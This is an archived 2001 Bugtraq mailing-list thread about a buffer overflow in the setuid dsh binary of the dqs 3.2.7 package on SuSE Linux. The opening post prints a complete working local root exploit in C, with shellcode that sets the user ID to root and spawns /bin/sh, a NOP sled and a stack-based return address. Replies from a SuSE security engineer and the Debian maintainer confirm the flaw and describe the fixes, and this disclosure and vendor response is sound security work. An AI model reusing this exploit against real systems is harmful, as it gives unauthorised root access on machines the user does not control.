6517688 2001-05-19 00:09 +0000 /183 rader/ dex dex <dexgod@softhome.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-19 04:52 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17096>
Ärende: dqs 3.2.7 local root exploit.
------------------------------------------------------------
From: dex dex <dexgod@softhome.net>
To: bugtraq@securityfocus.com
Message-ID: <20010519000911.4356.qmail@securityfocus.com>
Subject: dqs 3.2.7 local root exploit.
Hello.
DESCRIPTION:
I found a buffer overflow vunerability on the
/usr/bin/dsh (dqs 3.2.7
package).
I really don't know if this bug was discovered
already. if thats right,
then sorry =).
If a long line on the first argument is gived, the
program gives a SIGSEGV
signal.
This bug was reported to Drake Diedrich, Mantainer
for dqs
(Drake.Diedrich@anu.edu.adu).
AFFECTED:
SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default
an then it are vunerable,
maybe others.
FIX:
Remove the SUID permission
|root@netdex /root|# ls -la /usr/bin/dsh
-rwsr-xr-x 1 root root 502748 May 18
00:36 /usr/bin/dsh
|root@netdex /root|# chmod -s /usr/bin/dsh
|root@netdex /root|# ls -la /usr/bin/dsh
-rwxr-xr-x 1 root root 502748 May 18
00:36 /usr/bin/dsh
|root@netdex /root|#
EXAMPLE EXPLOIT:
You can found the exploit at
www.raza-mexicana.org/programas/programas/qsexp.c
And here it is:
----CUT HERE----
/* - dqsexp.c - */
/********************************************************************/
/* /usr/bin/dsh(dqs 3.2.7 package) local root
exploit. */
/* SuSE 6.3, 6.4, and 7.0 are
vunerable. */
/* dex@raza-mexicana.org <>
http://www.raza-mexicana.org */
/* Saludos: dr_fdisk^, yield, vlad, deadsector,
trovalz, fatal, */
/* megaflop y a todo raza. que weba escribirlos
todos XD. */
/* En especial saludos al espa~olete(NOP) :P, ya
sabes porque. */
/*
*/
/* - dex@raza-mexicana.org <>
http://www.raza-mexicana.org - */
/********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFSIZE 2772
#define OFFSET 0
#define ALIGN 0
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
static char code[]= /* stolen
from mount.c :P */
"\x29\xc0" /* subl
%eax, %eax */
"\xb0\x46" /* movb
$70, %al */
"\x29\xdb" /* subl
%ebx, %ebx */
"\xb3\x0c" /* movb
$12, %bl */
"\x80\xeb\x0c" /* subb
$12, %bl */
"\x89\xd9" /* movl
%ebx, %ecx */
"\xcd\x80" /* int
$0x80 */
"\xeb\x18" /* jmp
callz */
"\x5e" /* popl
%esi */
"\x29\xc0" /* subl
%eax, %eax */
"\x88\x46\x07" /* movb
%al, 0x07(%esi) */
"\x89\x46\x0c" /* movl
%eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl
%esi, 0x08(%esi) */
"\xb0\x0b" /* movb
$0x0b, %al */
"\x87\xf3" /* xchgl
%esi, %ebx */
"\x8d\x4b\x08" /* leal
0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal
0x0c(%ebx), %edx */
"\xcd\x80" /* int
$0x80 */
"\xe8\xe3\xff\xff\xff" /* call
start */
"\x2f\x62\x69\x6e\x2f\x73\x68";
void main(int argc, char **argv) {
int i;
unsigned long addr;
char *buffer;
int offset=OFFSET;
int buffsize=BUFFSIZE;
int align=ALIGN;
if (argc > 1 ) offset = atoi(argv[1]);
if (argc > 2 ) align = atoi(argv[2]);
if (argc > 3 ) buffsize = atoi(argv[3]);
buffer = (char *)malloc(buffsize + 8);
addr = get_sp() - offset;
for(i = 0; i < buffsize; i += 4) {
*(long *)&buffer[i] = 0x90909090;
}
*(long *)&buffer[buffsize - 8] = addr;
*(long *)&buffer[buffsize - 4] = addr;
memcpy(buffer + buffsize - 8 - strlen(code) -
align, code, strlen(code));
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local
root exploit.\n");
printf("[*] - dex@raza-mexicana.org <>
http://www.raza-mexicana.org -
\n");
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[*] Address=0x%x, Align=%d, Offset=%d\n",
addr, align, offset);
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[*] Starting....\n");
execl("/usr/bin/dsh", "dsh", buffer,
"/etc/motd", NULL);
}
----EOF----
=================================================
Mail: dex@raza-mexicana.org
Page: http://www.raza-mexicana.org
===============================================
(6517688) /dex dex <dexgod@softhome.net>/-(Ombruten)
6519015 2001-05-19 05:26 +0200 /63 rader/ Roman Drahtmueller <draht@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-19 20:46 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: draht@suse.de
Mottagare: Bugtraq (import) <17099>
Kommentar till text 6517688 av dex dex <dexgod@softhome.net>
Ärende: Re: dqs 3.2.7 local root exploit.
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: <bugtraq@securityfocus.com>
Message-ID: <ENOCOKE.draht.silence.0101051905112599024188505005-100000@suse>
> DESCRIPTION:
> I found a buffer overflow vunerability on the
> /usr/bin/dsh (dqs 3.2.7
> package).
>
> I really don't know if this bug was discovered
> already. if thats right,
> then sorry =).
No, this is yet unknown to security@suse.de.
> If a long line on the first argument is gived, the
> program gives a SIGSEGV
> signal.
>
> This bug was reported to Drake Diedrich, Mantainer
> for dqs
> (Drake.Diedrich@anu.edu.adu).
>
> AFFECTED:
> SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default
> an then it are vunerable,
> maybe others.
I confirm this vulnerability and that dqs has the setuid bit on the
file /usr/bin/dsh, but the package (as a package in the clustering
series) is not installed by default.
The fix (to remove the suid bit) is correct. If you have selected to
set the variable PERMISSION_SECURITY in /etc/rc.config to "secure
local" in SuSE-7.1 (recommended for security-enhanced settings), you
are not vulnerable. On SuSE-7.1, in addition to the chmod command
below, change the files /etc/permissions.*, too, to reflect the
removed suid bit.
If you do not need the dqs package, simply remove it using the command
rpm -e dqs
Of course, we will provide update packages as soon as possible.
> FIX:
> Remove the SUID permission
> |root@netdex /root|# ls -la /usr/bin/dsh
> -rwsr-xr-x 1 root root 502748 May 18
> 00:36 /usr/bin/dsh
> |root@netdex /root|# chmod -s /usr/bin/dsh
> |root@netdex /root|# ls -la /usr/bin/dsh
> -rwxr-xr-x 1 root root 502748 May 18
Regards,
Roman Drahtmüller,
SuSE Security.
--
- -
| Roman Drahtmüller <draht@suse.de> "Caution: Cape does not |
SuSE GmbH - Security enable user to fly."
| Nürnberg, Germany (Batman Costume warning label) |
- -
(6519015) /Roman Drahtmueller <draht@suse.de>/(Ombruten)
6519208 2001-05-19 14:09 +1000 /46 rader/ Drake Diedrich <Drake.Diedrich@anu.edu.au>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-19 21:59 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17102>
Kommentar till text 6517688 av dex dex <dexgod@softhome.net>
Ärende: Re: dqs 3.2.7 local root exploit.
------------------------------------------------------------
On Sat, May 19, 2001 at 12:09:11AM -0000, dex dex wrote:
>
> DESCRIPTION:
> I found a buffer overflow vunerability on the
> /usr/bin/dsh (dqs 3.2.7
> package).
>
...
>
> This bug was reported to Drake Diedrich, Mantainer
> for dqs
> (Drake.Diedrich@anu.edu.adu).
>
I maintain only the Debian packaging of the DQS
suite. /usr/bin/dsh can be entirely removed from a DQS cluster with
no ill effects, and was removed from the Debian packages in early
1998 as part of a general cleanup of the package. Debian 2.1 (slink)
and later are not vulnerable.
The original publisher (SCRI, Florida State University) is no
longer maintaining DQS or employing the original author, but has also
refused to relax distribution restrictions, making it difficult to
found a new developer community.
dqs (3.1.8-2) unstable; urgency=low
* Summarize and rotate monthly accounting logs
* Replaced /bin/mail with /usr/bin/sendmail
* Made /etc/dqs/conf_file into a configureation file. Changed DQS_BIN.
* Deleted dqs_options, dqs_random, and dsh
* Moved qmaster and dqs_execd to /usr/lib/dqs, edit DQS_BIN in
/etc/dqs/conf_file
* Switched to debhelper from debstd
* Added restart and force-reload to /etc/init.d/dqs
* A million Lintian fixes.
-- Drake Diedrich <Drake.Diedrich@anu.edu.au> Mon, 16 Feb 1998
11:47:04
+1100
--
Dr. Drake Diedrich, Head - Information and Communications Unit
John Curtin School of Medical Research, GPO Box 334 Canberra ACT 2601
Voice: +61(2)6125-2528 FAX: +61(2)6125-4823
(6519208) /Drake Diedrich <Drake.Diedrich@anu.edu.au>/(Ombruten)
Bilaga (application/pgp-signature) i text 6519209
6519209 2001-05-19 14:09 +1000 /12 rader/ Drake Diedrich <Drake.Diedrich@anu.edu.au>
Importerad: 2001-05-19 21:59 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17103>
Bilaga (text/plain) till text 6519208
Ärende: Bilaga till: Re: dqs 3.2.7 local root exploit.
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iQCVAwUBOwXyA9D4/OIVS4ptAQFKjwP/dAbOH7uJ2akj7JhVHCo2qobgG5v7p1Ab
8MWbaf6MojCOUJlHYKpYnhHKwCyWl6UicL3cPCQOkE5fPyarIOOVp9guFn7OR+nh
YYVLOf3/sciJW4UKIVKYqtAppCcnnRdW9ckJAy+D4LZ1pySKcASMs1y4oUgndc3P
xtx6WSn9hy0=
=JRH2
-----END PGP SIGNATURE-----
(6519209) /Drake Diedrich <Drake.Diedrich@anu.edu.au>/